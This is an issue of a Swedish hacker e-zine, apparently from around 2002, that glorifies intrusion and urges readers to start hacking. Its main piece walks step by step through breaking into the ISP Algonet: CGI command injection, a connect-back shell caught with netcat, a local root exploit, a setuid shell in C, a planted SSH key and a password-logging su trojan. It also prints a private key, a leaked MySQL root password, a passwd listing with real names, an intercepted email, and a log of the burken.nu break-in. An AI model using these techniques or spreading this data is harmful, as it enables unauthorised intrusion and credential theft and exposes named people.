.##. .####.

1. .##.
2. .####.
3. .########.
4. .#### ####.
5.  
6. .######################.
7. .#############################.
8. .###### ######.
9. .#### ###### ####.
10. #### ######## #####
11. #### ######## #####
12. ###### #### #######
13. ########### ###########
14. ##########################
15. .###. .###.
16. .###. +--------------------+ .###.
17. .###. |THE CONSPiRACY: 0x01| .###.
18. .###. +--------------------+ .###.
19. .###. .###.
20. .###. +--------+--------------------+--------+ .###.
21. .###. 0n th3 m1ss1on 2 sch00l th3 und3rgr0und! .###.
22. .###. +--------------------------------------+ .###.
23. .###. (C)31337 TC / TheConspiracy - STFU FFS!! .###.
24. .###. +--------------------------------------+ .###.
25. .###. .###.
26. .##################################################################.
27. .####################################################################.
28. ++
29. ||
30. ||
31. ||
32. +--------------------------+|
33. |+--------------------------+
34. ||
35. +---++----------+[C0NTENT]+---------------------------+
36. | |
37. | [0x01]-------> iNLEDNiNG!! |
38. | [0x02]-------> h4cking ALGOnet f0r fun 4nd pr0f1t |
39. | [0x03]-------> Hackare av idag |
40. | [0x04]-------> Burken.nu blir fet�gd |
41. | [0x05]-------> the AUH manifesto |
42. | [0x06]-------> Liten guide till ett s�krare liv |
43. | [0x07]-------> Mobbade barn med 0day exploitz |
44. | |
45. +---------------------------------------------+-------+
46. |
47. |
48. +----------------+------+
49. | WHITNEY WAS INNOCENT! |
50. +-----------------------+
51. |
52. |
53. |
54. |
55. |
56. |
57. |
58. |
59. |
60. |
61. |
62. +---+[0x01: iNLEDNiNG!! ]+--------------+-------------------------------------+>
63. |
64.  
65. Ni kanske trodde att den digitala underjorden i sverige helt hade
66. somnat in och l�mnat �ver tronen till barnen p� DALnet? Icke.
67. Den svenska eliten har h�llt sig tyst och i bakgrunden fortsatt
68. att sprida 0ndska och kaos p� de elektroniska motorv�garna.
69. Nu �r vi tillbaka f�r att �nnu en g�ng r�ra om i grytan och visa
70. en annan sida av scenen �n den du hittar p� flashback och DALnet.
71.  
72. Ni kanske trodde att internet var en s�ker lekstuga?
73. Ni har h�rt Joakim von Braun och Per Hellquist och alla andra
74. experter uttala sig om hackers av idag. tror ni p� det dom ber�ttar?
75.  
76. "Trots att virusangreppen kostar f�retag och samh�llet hundratals
77. miljoner, �r det f� som vet hur s�rbart IT-samh�llet �r"
78. s�ger Joakim von Braun, s�kerhetsr�dgivare vid IT- s�kerhetsf�retaget Symantec.
79.  
80. TheConspiracy vet, vi l�ser n�mligen hans epost.
81.  
82. To: [email protected]
83. From: Joakim von Braun ([email protected])
84. Subject: Re: Har du h�rt n�got om?
85. Date: 15 sep 2002 09:30:09 -0800
86.  
87. > Jag har tittat igenom det och
88. > tror att det nog �r bluff, men s� har jag inte dina
89. > kontakter bland hackers..
90.  
91.  
92. Jo, det �r sant. Det �r nog en bluff.
93. Jag har tittat igenom allt material och kan
94. inte se hur attacken skulle ha g�tt till.
95.  
96. Cheers
97. Joakim
98.  
99.  
100. Joakim von Braun phone +46-(0)8-428 95 05
101. von Braun Consultants cell phone +46-(0)709-56 16 42
102. Kristinehovsgatan 14
103. SE-117 29 Stockholm, SWEDEN
104.  
105. The Trojan Database: http://www.simovits.com/trojans/trojans.html
106.  
107.  
108. Vill du se ditt egna favvohack h�r i zinet s� bara maila in det.
109. Detta f�rsta nummer inneh�ller mycket material fr�n gruppen
110. AUH, Arga Unga Hackare, 31337!!
111.  
112. Vi sl�pper detta zinet endast f�r att visa att vi har r�tt och
113. att alla andra har fel. mycket fel. Vi �r h�r f�r att visa er nya
114. v�gen till framg�ng och f�r att visa er som slutat v�gen tillbaka!
115.  
116. B�RJA HACKA! VI VET ATT NI VILL! <-- OBS
117.  
118. maila in dina loggar/trix till The
119.  
120. +
121. |
122. +---+[TheConspiracy staff]+-----+---+>
123. |
124. |
125. |
126. |
127. +-----------------------------+-----------------------------------+
128. | '1/2', in fact, can never be found in the real world, |
129. | and there are historical and archeological reasons to believe |
130. | it was created by a Greek mathematician under the influence of |
131. | the mind-warping hallucinogenic mushroom Amanita muscaria. |
132. +----------------------------------------------------------+------+
133. |
134. |
135. |
136. |
137. +---+[0x02: h4cking ALGOnet f0r fun 4nd pr0f1t ]+------------+----------------+>
138. |
139. +
140.  
141. S���.. du vill hacka dig in p� algonet s�ger du?
142. Well, alla coola kidsen har varit d�r, s� varf�r skulle du vara s�mre?
143. Bunkra upp med knark och chips och ta p� dig din finaste hackarskjorta
144. f�r nu skall vi p� utflykt till ett n�t som kommer ge flera av er nostalgiska
145. t�rar i �gonvr�n. n�mligen Algonet, eller Telenordia som det heter numera.
146. Hur som helst s� �r dom j�vligt �gda och tur �r v�l det, annars skulle jag
147. vara tvungen att skriva om hur du installerar mIRK eller formaterar en floppy
148. eller n�gon annat som hackare g�r p� sin fritid. Hackare har n�mligen gott om
149. fritid d� de inte har n�gra v�nner, eller de f� v�nner dom har som lever sitt
150. liv p� mIRKen �r fullt upptagna med att r�ka B0NG och skriva 0nd kod s� dom har
151. inte tid att umg�s med loosers som du.
152. H�r kommer det ni alla har v�ntat p�:
153. utan ytterligare on�dig inledningstext:
154. TheConspiracy presenterar stolt:
155. RiktigtOndHackerSkola - del ett:
156.  
157. +-----------------------------------------------------------------------------+
158. |!Hacking algonet for fun and profit!! (det �r inte snyggt, men det �r kul) |
159. +-----------------------------------------------------------------------------+
160.  
161. Att hacka WEBBEN �r v�ldigt popul�rt bland ungdomar nuf�rtiden. Har du precis
162. som s� m�nga andra undrat hur s�nt d�r egentligen g�r till? Ist�llet f�r att
163. svamla om massa trams s� tar vi ett praktiskt exempel! Vi skaffar oss helt
164. enkelt fetroot p� algonet genom ett h�l i just WEBBEN.
165.  
166. F�r att f� fetroot m�ste man f�rst ha ett s�tt att ber�tta f�r datorn i fr�ga
167. vad man vill att den skall utr�tta. i v�rat fall vill vi att den skall utf�ra
168. 0nda hackarekommandon, n�got som datorer vanligtvis inte alls h�ller p� med.
169.  
170. Vi vet att Algonet till�ter sina dumma anv�ndare att skriva sina egna CGIscript
171. och eftersom vi ocks� vet att de flesta av alla som anv�nder en dator �r
172. dummare �n sina floppydrives s� kan vi kallt r�kna med att flertalet av dessa
173. CGIs gladligen tar v�ra hackarekommandon och skickar vidare till skalet.
174. Vi anv�nder en s�kmotor p� WEBBEN f�r att s�ka upp lite skripp och efter n�gra
175. minuter har vi hittat en anv�ndare som har r�kt alldeles f�r mycket B0NG och
176. misslyckas fatalt med att skriva k0d som inte funkar som vi vill.
177.  
178. �vning ett: anv�nd din webbl�sare f�r att titta p� www.altavista.com
179. och s�ka efter CGI skript hos algonet. (search: +URL:algonet.se +URL:.cgi)
180.  
181. Vi v�ljer ut ett offer och skrider till verket - Det �r nu mycket viktigt
182. att uppr�tth�lla en h�g knark/blod ratio i �drorna, s� ni inte pl�tsligt mitt
183. i hacket r�kar uppleva verkligheten, d� denna kan vara skadlig och inte alls bra
184.  
185. "http://cgi.algonet.se/xxx/visasida.cgi?page=main.html"
186.  
187. Ja detta var fint, vi testar n�gra 0nda kommandon f�r att se att det verkligen
188. fungerar som det ska, och det g�r det. s� ta n�gra sista djupa bloss p� B0NGen
189. och s�tt dina bleka fingrar mot tangentbordet s� skall vi ut p� en trevlig resa.
190.  
191. # # # # # # # # # # # # # # # # # #
192. # OBS OBS OBS OBS OBS OBS OBS OBS #
193. # #
194. # Kids, dont try this from home!! #
195. # #
196. # OBS OBS OBS OBS OBS OBS OBS OBS #
197. # # # # # # # # # # # # # # # # # #
198.  
199. Nu n�r vi skall beg�r BROTT s� vill vi inte g�ra det fr�n mammas telelina
200. eftersom hon d� antagligen kommer bli sur och ta din fina Petium (MMX) ifr�n dig
201. Vi binder d�rf�r en proxykedja till den lokala telnetporten och hoppas p�
202. det b�sta.
203.  
204. # telnet localhost
205. Trying 127.0.0.1...
206. Connected to localhost.
207.  
208. # Det vi har hittat om ni fattar det, �r ett CGIscript vi kan k�ra kommandon
209. # genom!
210. # Att sitta och skriva in URLer hela tiden �r inte s� kul, s� vi h�mtar v�ran
211. # programming for dummies bok och l�r oss hur man skriver ett skalskript som
212. # utf�r v�ra 0nda g�rningar.
213. #
214.  
215. $ cat > algo.sh
216. #!/bin/sh
217. while [ - ]; do
218. echo -n ">"
219. read BAR
220.  
221. FOO=$(echo $BAR | sed -e 's/\ /%20/g')
222. lynx -source "http://cgi.algonet.se/xxx/visasida.cgi?$FOO"
223. done
224. ^D
225. $ chmod 755 algo.sh
226. $ ./algo.sh
227. >uname -a
228. <HTMl><BODY><ISINDEX><PRE>
229. SunOS sten 5.8 Generic_108528-08 sun4u sparc SUNW,UltraSPARC-IIi-cEngine
230. >who
231. <HTMl><BODY><ISINDEX><PRE>
232. root console xxx xx xx:xx
233. onm pts/1 xxx xx xx:xx (xena.algonet.se)
234. >
235.  
236. #
237. # Vi m�rker snabbt att v�rat WEBB-skal �r s�mre �n Elvis, s� vi anv�nder
238. # v�ra tokiga skillz f�r att uploada lite warez till datorn s� vi blir
239. # klara i tid till n�sta B0NG. Vi valde att ladda upp ett connectbackskal.
240. # det �r som telnet, fast tv�rt om.. Och s� beh�ver du inga jobbiga l�senord
241. # eftersom du �r en hackare, och hackare anv�nder inte saker som l�seord.
242. #
243.  
244. >gcc cb.c -o cb
245. >./cb xxx 80
246.  
247.  
248. #
249. # Det h�r kommer vara lite klurigt, du f�rst�r att detta h�nder lite f�re, efter
250. # och samtidigt som det ovanf�r, vi har som alla riktiga IT brottslingar
251. # minst tv� terminaler ig�ng, sen har vi en tredje som vi kollar p� PORR i.
252. # och en fj�rde med mIRCK s�klart.
253. # men i v�ran andra(2) terminal, den som vi startade netcat i, f�re vi k�rde
254. # connectbackskalet, ser ut s� h�r:
255.  
256. #nc -vvlp 80
257. listening on [any] 80 ...
258. Warning: forward host lookup failed for stanley.algonet.se: Unknown host
259. connect to [xxx] from stanley.algonet.se [194.213.75.184] 45204
260.  
261. id
262. uid=xxx(xxx) gid=2000(algonet)
263.  
264.  
265. #
266. # Ok, vi som kan v�ran lunix ser snabbt att vi oturligt nog inte �r
267. # klara h�r, vi har fortfarande inte fetroot fast vi har jobbat s� h�rt!
268. # Vi ger oss ut bland dom lokala H/P/A BBSerna f�r att hitta lite ny
269. # 0dagars-warez som kan hj�lpa oss lite p� v�gen.
270. #
271.  
272. gcc rt.c -o r00t;
273.  
274. ./r00t
275. id;
276. uid=0(root) gid=2000(algonet)
277.  
278. #
279. # Ok pojkar och flickor(you wish), nu har vi fetroot, dock bara p� en server.
280. # Och det �r inte ens en rolig server. Men varf�r har vi sl�sat all denna tid
281. # undrar ni nu. Det skall jag ber�tta. Algonet har n�mligen alla anv�ndares
282. # mappar och filer och s�nt p� tv� centrala datorer, som kallas Piff och Puff.
283. # Du kanske kommer ih�g namnen fr�n julafton n�r du sitter och skrattar �t
284. # den dumma hunden som aldrig f�r fast dom sm� elaka r�ttorna.
285. # Piff och Puff �r s� kallade NSF servrar, varf�r det heter NSF servrar, eller
286. # varf�r algonet har d�pt dom till Piff och Puff, som inte har n�got alls med
287. # varken nazism eller data att g�ra, har jag verkligen ingen aning om.
288. # Piff och Puff delar iallafall ut all denna data till de servrar som beh�ver
289. # den, det roliga med detta �r att om vi skriver saker bland n�gons databitar
290. # p� en server, s� kommer det finnas d�r p� ALLA servrar!! Helt magiskt!
291. # Det som vi kommer att t�nka p� f�rst �r SSH-nyckelfiler, en liten sak som
292. # g�r att du kan vara hackare med SSH! Dvs utan att anv�nda passwrdz. Om
293. # vi l�gger en s�n bland en admins data, s� kan vi logga in som honom p�
294. # alla Algonets servrar!! fattar ni vart jag vill komma? Bra. Ladda om B0NGen
295. # och f�rbered din ssh-nyckelfil, s� forts�tter vi efter en tiominuter rast.
296. #
297.  
298. # cat > cid.c
299. #include <stdio.h>
300.  
301. int main(int argc, char** argv) {
302.  
303. if(argc < 3) {
304. setuid(0);
305. setgid(0);
306. seteuid(0);
307. setegid(0);
308. }
309. else {
310. setuid(atoi(argv[1]));
311. setgid(atoi(argv[2]));
312. seteuid(atoi(argv[1]));
313. setegid(atoi(argv[2]));
314. }
315.  
316. execl("/bin/sh","sh",NULL);
317. }
318.  
319. # /usr/local/bin/gcc cid.c -o cid
320.  
321. #
322. # Eftersom man inte f�r peta p� andras filer fast man �r tokroot �r lite jobbigt
323. # men l�tt �verkomligt, vi vill inte anv�nda su f�r att d� fastnar man i massa
324. # loggar som man inte riktigt vet vem som l�ser. B�st att vara f�rsiktig
325. # Nu vidare!
326.  
327.  
328. head -15 /etc/passwd
329. root:x:0:1:Super-User:/:/sbin/sh
330. qmaild:x:504:100::/var/qmail:/bin/sh
331. qmaill:x:505:100::/var/qmail:/bin/sh
332. qmailp:x:506:100::/var/qmail:/bin/sh
333. qmailq:x:501:101::/var/qmail:/bin/sh
334. qmailr:x:500:101::/var/qmail:/bin/sh
335. qmails:x:502:101::/var/qmail:/bin/sh
336. alias:x:503:100::/var/qmail/alias:/bin/sh
337. www:x:101:100:AlgoNet Webmaster:/home/user2/www:/bin/tcsh
338. onm:x:107323:1000:Ola Nystrom:/home/user10/onm:/usr/bin/zsh
339. sshd:x:117444:66668:sshd privsep:/var/empty:/bin/false
340. adh:x:99901:1000:Anders Haglund:/home/adh:/bin/tcsh
341. anarchy:x:1400:1400::/import/usrusr/anarchy:/bin/false
342. nobody:x:60001:60001:Nobody:/:
343. noaccess:x:60002:60002:No Access User:/:
344.  
345.  
346. #
347. # Hmm, d�r har vi adminsen p� Algonet, trevligt.. Vi v�ljer en p� m�f�
348. # och forts�tter v�ran utflykt.
349. #
350.  
351.  
352. ./chid 107323 1000
353. id
354. uid=107323(onm) gid=2000(algonet)
355.  
356. # ssh-keygem -t dsa
357. Generating public/private dsa key pair.
358. Enter file in which to save the key (/root/.ssh/id_dsa): knark
359. Enter passphrase (empty for no passphrase):
360. Enter same passphrase again:
361. Your identification has been saved in knark.
362. Your public key has been saved in knark.pub.
363. The key fingerprint is:
364. 12:b9:79:f7:bc:77:92:f2:25:94:33:68:90:7b:2b:32 root@3v1l
365.  
366. cat >> .ssh/authorized_keys < _EOF_
367. -----BEGIN DSA PRIVATE KEY-----
368. MIIBuwIBAAKBgQDE4836KtFl/kwJsJensnvYgjdPHSixvT68oJ8n23TZgf74PTdI
369. MXGsXtcNds9snH6K9vtWMd+0alm9/f1IlzxQLihN2ToXFIMyPRmaeDFP6T1wb0L/
370. uYYa1xrWbDDWJjB737K4XuWo+coJgYdvo+xzjH05AGRE2yIx/iJk6pyWPQIVAIZt
371. VeO5HSGceET3IAQ21YBJxtn1AoGAdLC6QAFx4t4Y5pTbCkhVq3/LcPaGL8mEPl3A
372. 4d+IIpLlW+G9sPWxgwQHFLSR061oHcZ7EwquChUyN7FMF59qTEL1KzsZ+rqqShcv
373. tQZ4T8J44fGVqE4Pw3AJAOtqDbWEY5gK0HQhYBW73SGQV7QFJ8Otxn8MI5DD4/K+
374. LRw0HakCgYEAu53P58hUzTABUdbZxwC8Zn6+FEa/XXa0UxxiCx1ZJGYjH+vM+Yow
375. EtgVVgxY6pOw/Ltyd2hTi+4dGiNqtmqiNHXxuYm0cvhELth/R9NwYBpBxTGd2RCt
376. /qt/O7F9T7Vl2DZxAkoe0FkcX5T1WXGwLyXjAdA0avbRomUBWBRbcfMCFBaRBcj+
377. dmrfJ63FAQbiKoKHpKtg
378. -----END DSA PRIVATE KEY-----
379. _EOF_
380.  
381. #
382. # Hihi, En elak liten present vi l�mnade h�r :-)
383. # Nu b�rjar v�ran resa n�rma sig sitt slut,
384. # Hoppas ni h�nger med s� h�r l�ngt!
385. # Vi m�ste ju testa att v�ran plan fungerar, s�
386. # vi startar ytterligare en terminal, hoppar lite
387. # kors och tv�rs �ver n�tet p� v�ra tokrootade burkar
388. # och f�rs�ker slutligen logga in, h0h0
389.  
390. # ssh -i knark [email protected]
391. The authenticity of host 'kairos.algonet.se (213.150.135.237)' can't be established.
392. RSA key fingerprint is 53:e6:bd:e2:b9:bb:5b:a0:ea:59:b4:17:1d:f8:9f:98.
393. Are you sure you want to continue connecting (yes/no)? yes
394. Warning: Permanently added 'kairos.algonet.se,213.150.135.237' (RSA) to the list of known hosts.
395. Last login: Fri Sep 6 10:39:43 2002 from xena.algonet.se
396. Sun Microsystems Inc. SunOS 5.8 Generic February 2000
397. Skriv "meny" om du vill starta det lokala menysystemet.
398.  
399. [kairos/onm] ~ > id
400. uid=107323(onm) gid=1000(stuff)
401. [kairos/onm] ~ >
402.  
403.  
404. # Nu �r �r jobbet att bli root p� alla kvar.
405. # Men det l�mnar jag till er l�sare sj�vla att
406. # l�sa! men jag skall ge er n�gra tips s� ni inte st�r
407. # d�r helt med sk�gget i brevl�dan!
408. #
409. # F�rst kan man t�nka att �ven piff och puff, du vet dom
410. # tv� r�ttservrarna som inneh�ll alls filer och dokument?
411. # dom kan man ocks� logga in p� med nyckelfilen!
412. #
413. # Ett annat s�tt �r att cracka rootl�senordet vi hittade p� sten o stanley.
414. # det l�ter som en ganska trevlig ide tycker jag, men sj�lv s� �r jag f�r lat
415. # cracka och vill bli klar s� snabbt som m�jligt s� jag kan dra och k�pa mer
416. # sprit och piller. S� jag planterar en su trojan i hans hemkatalog och aliasar
417. # su till den, Bakd�rren skickade vidare username och password till su s� han
418. # loggades in som root som vanligt, men l�sen loggas!! muahaha! elakt va?
419. # det firar vi med ett bloss p� B0NGen och stor klunk vodka.
420. # Nu har vi rootl�sen till alla burkar han k�rde su p�, bla kairos!
421. # en mycket bra sak att ha!
422. #
423. # Vi har st�dat upp alla verktyg/loggar/bakd�rrar som vi anv�nde
424. # f�r att ge er en chans att f� fetroot p� algonet alldeles sj�lva!
425. # Ja det var roligt, eller hur? N�? vad v�ntar ni p�? B�rja hacka!
426. # men gl�m fan inte att st�da i loggarna efter er nu!
427. #
428. # Kom ih�g!
429. #
430. # SANT --> VILL MAN BLI HACKER S� M�STE MAN HACKA! <-- SANT!
431. # SANT --> VILL MAN BLI HACKER S� M�STE MAN HACKA! <-- SANT!
432. # SANT --> VILL MAN BLI HACKER S� M�STE MAN HACKA! <-- SANT!
433. # SANT --> VILL MAN BLI HACKER S� M�STE MAN HACKA! <-- SANT!
434. #
435. # - TC - sch00ling th3 und3rgr0undz
436. #
437. #
438.  
439. PS. F�r er som inte orkar hacka sj�lva s� finns h�r ssh-nyckelfilen!!!
440.  
441. -----BEGIN DSA PRIVATE KEY-----
442. MIIBuwIBAAKBgQDE4836KtFl/kwJsJensnvYgjdPHSixvT68oJ8n23TZgf74PTdI
443. MXGsXtcNds9snH6K9vtWMd+0alm9/f1IlzxQLihN2ToXFIMyPRmaeDFP6T1wb0L/
444. uYYa1xrWbDDWJjB737K4XuWo+coJgYdvo+xzjH05AGRE2yIx/iJk6pyWPQIVAIZt
445. VeO5HSGceET3IAQ21YBJxtn1AoGAdLC6QAFx4t4Y5pTbCkhVq3/LcPaGL8mEPl3A
446. 4d+IIpLlW+G9sPWxgwQHFLSR061oHcZ7EwquChUyN7FMF59qTEL1KzsZ+rqqShcv
447. tQZ4T8J44fGVqE4Pw3AJAOtqDbWEY5gK0HQhYBW73SGQV7QFJ8Otxn8MI5DD4/K+
448. LRw0HakCgYEAu53P58hUzTABUdbZxwC8Zn6+FEa/XXa0UxxiCx1ZJGYjH+vM+Yow
449. EtgVVgxY6pOw/Ltyd2hTi+4dGiNqtmqiNHXxuYm0cvhELth/R9NwYBpBxTGd2RCt
450. /qt/O7F9T7Vl2DZxAkoe0FkcX5T1WXGwLyXjAdA0avbRomUBWBRbcfMCFBaRBcj+
451. dmrfJ63FAQbiKoKHpKtg
452. -----END DSA PRIVATE KEY-----
453.  
454.  
455. |
456. +---+[TheConspiracy hakker crew]+---+-----------------------------------------+>
457. |
458. |
459. +-------------------+------------------------------+
460. | Kommer m�nskligheten att g� under eller g� �ver? |
461. +------------------------------------------------+-+
462. |
463. |
464. <+---------------------------------------------------------------+------------+>
465.  
466. # telnet eleet.navy.mil
467. Connected to eleet.navy.mil.
468. Escape character is '^]'.
469.  
470. *****************************************************************************
471. *** WARNING *** *** WARNING *** *** WARNING *** *** WARNING ***
472. This is a Department of Defense computer system. This computer system,
473. including all related equipment, networks and network devices (specifically
474. including Internet access), are provided only for authorized U.S.
475. government use. DoD computer systems may be monitored for all lawful
476. purposes, including to ensure that their use is authorized, for management
477. of the system, to facilitate protection against unauthorized access, and
478. to verify security procedures, survivability and operational security.
479. Monitoring includes active attacks by authorized DoD entities to test
480. or verify the security of this system. During monitoring, information
481. may be examined, recorded, copied and used for authorized purposes. All
482. information, including personal information, placed on or sent over this
483. system may be monitored. Use of this DoD computer system, authorized or
484. unauthorized, constitutes consent to monitoring of this system.
485. Unauthorized use may subject you to criminal prosecution. Evidence of
486. unauthorized use collected during monitoring may be used for administrative,
487. criminal, or other adverse action. Use of this system constitutes consent
488. to monitoring for these purposes.
489. *** WARNING *** *** WARNING *** *** WARNING *** *** WARNING ***
490. *****************************************************************************
491.  
492.  
493. login: toor
494. Please wait...checking for disk quotas
495.  
496. RESTRICTED RIGHTS LEGEND
497. Use, duplication, or disclosure by the U.S. Government is subject to
498. restrictions as set forth in sub-paragraph (c)(1)(ii) of the Rights in
499. Technical Data and Computer Software clause in DFARS 252.227-7013.
500.  
501.  
502. Rights for non-DOD U.S. Government Departments and Agencies are as set
503. forth in FAR 52.227-19(c)(1,2).
504.  
505.  
506. Value of TERM has been set to "xterm".
507. WARNING: YOU ARE SUPERUSER !!
508.  
509. #
510.  
511. <+---------------------------------------------------------------+------------+>
512. |
513. |
514. |
515. +---+[0x03: elaka MMX hackare av idag ]+-------------------------+------------+>
516.  
517.  
518. Whitehats. Blackhats. Greyhats.
519.  
520. Smaka p� dessa mediaord.
521. Ni har antagligen l�st dessa ord b�de en och tv� g�nger och kanske till och med
522. trott att ni varit kapabla att applicera dem p� folk ni k�nner eller har l�st om
523. Whitehats - de f�r en att associera till vita �nglar, moralens v�ktare.
524. Blackhats - de �r motsatsen, onda �nglar. H�nsynsl�sa �nglar helt utan skrupler.
525. En greyhat �r n�gon slags vilsen whitehat, n�gon som inte alls har fattat
526. grejjen och tror sig kunna st� med ett ben p� varje sida.
527.  
528. Orden �r beskrivningar p�hittade av media i slutet av 90-talet f�r att kunna
529. dela in dessa s.k. hackare man skrev om i olika l�ger. Ordet hackare har ju
530. alltid varit sv�rt. Vad �r egentligen en hackare? Hur beter dem sig? Osv..
531. En myt �r att riktiga hackare �r s�dana typer som MIT-hackarna. Det �r l�gn.
532. MIT-hackarna var n�rdar utan liv med l�g imponansfaktor. Sen kom man p� att
533. hackare kanske var s�dana typer som br�t sig in i datorsystem. Fast d�r st�tte
534. man ocks� p� problem.
535. Det gick helt enkelt inte att kategorisera b�da typerna som hackare.
536. Dvs, typerna som br�t sig in i system f�r att det var kul och vars enda
537. avsikt var att att kn�cka systemen (yeah, right), och typerna som br�t sig
538. in f�r att stj�la information eller vad som helst som inte �r helt
539. f�rsvarbart. Den ena var ju en hackare och den andra en cracker. Och en
540. cracker �r ju en s�n som kn�cker program?
541. Fast egentligen �r en cracker, dvs en ond hackare, en hackare?
542. Massor med onyttig f�rvirring. H�r fanns det utrymme f�r nya beskrivningar.
543. Onda hackare kallades blackhats.
544. Sn�lla hackare (haha) kallades whitehats.
545. Sn�lla hackare som varit/�r onda i smyg kallade man greyhats.
546. Skitbra, helt pl�tsligt gick det att kategorisera hackarna.
547.  
548. Nu blev det helt pl�tsligt dags f�r alla s.k. hackare att kategorisera sig.
549. De seri�sa m�nniskorna, bl.a. de som jobbade f�r Defcom eller ISS - de var
550. s�klart whitehats. F�r vem vill ha smuts p� fingrarna om man ska s�lja sig
551. som s�kerhetskonsult? Sen var det dom tuffa sm� hackarna. De titulerade sig
552. s�klart blackhats. De hade r�d att vara coola eftersom ingen kom att jobba
553. med dem �n. Men framf�rallt ville de ha respekt och ber�melse. S�nt man kan
554. f� p� IRC som �r centrum f�r alla j�vla scenhoror. Till slut blev det en grupp
555. �ver, de som betedde sig likt blackhats p� fritiden men jobbade likt whitehats
556. p� arbetstid. Dessa var greyhats. Lite vitt och lite svart.
557.  
558. Ni sitter p� IRC och jiddrar om vilken j�vla hatt ni sj�lv b�r och funderar
559. �ver vilken hatt folk ni h�r om, folk ni l�ser om och folk ni tr�ffar,
560. f�rtj�nar att b�ra eller b�r.
561.  
562. Under tiden sitter vi och fet�ger era geekstations och snor er warez!
563.  
564. Om ni n�gonsin tycker att ni b�r n�n slags hatt s� �r ni inga hackare.
565. Det finns inget som definerar en hackare som whitehat, greyhat eller blackhat.
566. Och det finns inga crackers, och inte heller onda eller goda hackare.
567. Den som tar p� sig N�GON hatt �r inte en hackare. Punkt slut.
568.  
569. F�R DET �R JU S� J�VLA UPPENBART.
570. HACKARE SOM INTE HACKAR �R INGA HACKARE.
571. ALLTS�.
572.  
573. HACKARE HACKAR!
574.  
575. Samma sak med problemet huruvida man �r 'l33t eller inte.
576. Piece of k4k4. Det �r ni inte och kommer ni aldrig att bli.
577. Men f�r all del, sitt g�rna d�r och bli j�mf�rd med n�gon som �r sn�ppet
578. mer clueless som dig och k�nn dig elajt. MMX!
579.  
580. (Sensmoralen i den h�r texten �r - Sluta jiddra, b�rja hacka.)
581.  
582. +
583. |
584. +-----------------------------------------------------------------------+------>
585. |
586. |
587. |
588. +---+[0x04: burken.nu blir fet�gd! ]+-----------------------------------+------>
589. |
590. +-----------------------------------------------------------+
591. | Att burken.nu blev hackad har v�l knappast undg�tt n�gon |
592. | och m�nga teorier om "hur" har spridits. TheConspiracy |
593. | har dock f�tt den exklusiva m�jligheten att h�r �terge |
594. | hacket men hj�lp av �kta terminalloggar! |
595. | Tyv�rr fick vi strippa ner ordentligt eftersom vi har |
596. | begr�nsat utrymme i det h�r zinet |
597. | Credits till AUH f�r detta =) |
598. +-----------------------------------------------------------+
599. |
600.  
601.  
602.  
603. Sent som fan - Torsdag
604.  
605. Ey dagboksmannen!
606.  
607. Idag k�nde jag f�r att driva en n�rdadmin till vansinne, s� jag t�nkte
608. att jag skulle roota en shellserver.
609.  
610. N�gonstans ska man b�rja, s� jag drog mig till minnes ett mail i en mail-
611. spool om loginuppgifter till Burken.NU.
612. En shelltj�nst d�r man f�r skal, irc, mysql, php och annan j�vla webbskit.
613.  
614. Kopplade upp mig mot en switch, loggade p� ett g�ng andra burkar och
615. gled sakta men s�kert in p� burken(.nu) och tittade runt lite.
616.  
617. Webbtj�nsten ligger visst p� en annan burk, kallad fs02.
618. Alla hemkataloger �r NFS-monterade med AMD. M�nga users �r tuffa och har
619. satt sin hemkatalog till chmod 711. Och i de andra finns det inte mycket
620. att h�mta. Inte heller ligger det n�gra worldreadable backups i filsystemet
621. med intressant information som kan vara till nytta f�r anv�ndare med genuint
622. ont upps�t.
623.  
624. Eftersom jag noterade att l�senorden f�r login och mysql var samma i mailet
625. l�gger jag ihop ett och ett. (look m0m, i g0t d4 apr0pr1at3 sk1llz)
626. Snabbt hackar jag ihop ett script som tvingar AMD att montera hemkatalogerna,
627. g�r in i dem, vidare in i public_html och plockar informationen i PHP-filerna
628. som anv�nds f�r att komma �t respektive mysql databas.
629. Sen knackade jag ihop ett PHP-dokument som med IMAP verifierar alla
630. anv�ndarnamn och l�senord jag f�tt mot IMAP-servern -
631. Till min f�rv�ning uppt�cker jag endast ett f�tal har bytat bort de s�kra
632. (kombinationsm�ssigt :P), slumpm�ssiga l�senorden mot egna. Det var ju dumt.
633.  
634. Jag sitter nu p� en hel del (ok, n�stan alla) konton till Burken.NU.
635. J�vla klantskallar. Jag �ger, hahaha. Men �nd�, vanliga konton �r faktiskt
636. relativt meningsl�sa..
637. Varf�r bry sig om grus n�r man kan gr�va guld?
638.  
639. Spacedump, en pojke p� internet, �r admin och tror att han kan g�ra som han
640. vill. Men h�ller vi inte alla med om att han g�r helt j�vla fel n�r han
641. accessar sin sqldatabas med root-kontot som ligger i en 644 fil?
642.  
643. mysql_connect("localhost", "root", "nattis");
644.  
645. LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump
646. LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump
647. LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump - LOL @ Spacedump
648.  
649. Greppar ut en anv�ndare p� h, som i hackare, fr�n min coola kontolista
650. och loggar p� mot burken igen. T�nkte att det vore roligt att titta runt p�
651. webbservern ocks�, s� jag hackar ihop ett PHP-script som ska hitta p�
652. sattyg och andra ondheter.
653.  
654. Tyv�rr hade n�gon slagit p� safemode i PHP s� det f�rs�ket gick �t pipan.
655. Men det �r ingen ide att lipa f�r det, s� jag g�r till php.net och l�ser p�
656. om hur safemode fungerar och vad parametrarna g�r.
657. Hittar n�got som verkar kajko och efter n�gra f�rs�k kan jag exekvera
658. program som uid httpd.
659.  
660. En terminallogg s�ger mer �n tusen ord, s� *fanfar*:
661.  
662. +---------------------------------------------------+
663. |EDITOR note: Alla loggar �r kraftigt editerade |
664. | pga utrymmet. Men ni fattar nog �nd�. |
665. | |
666. | N�r loggen b�rjar har precis v�r hacker skaffat |
667. | sig terminalacess genom ett connectback skal som |
668. | exekveras genom ett phpscript. |
669. | Detta ser man mycket ofta, folk som tror dom �r |
670. | s�kra bara f�r att deras anv�ndare inte har skal |
671. | p� just den datorn. |
672. | DAX ATT VAKNA! SK�T DITT JOBB ELLER BLI �GD! |
673. | |
674. | Det �r allts� spacedumps wwwserver som visas. |
675. | (burken.nu/www.linux.se/www.xmms.org/m.fl) |
676. +---------------------------------------------------+
677.  
678. $ w
679. 11:15pm up 14 days, 21:02, 30 users, load average: 0.66, 0.50, 0.48
680. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
681. spacedmp pts/1 fs01.spacedump.p 8Sep 2 13days 0.16s ? -
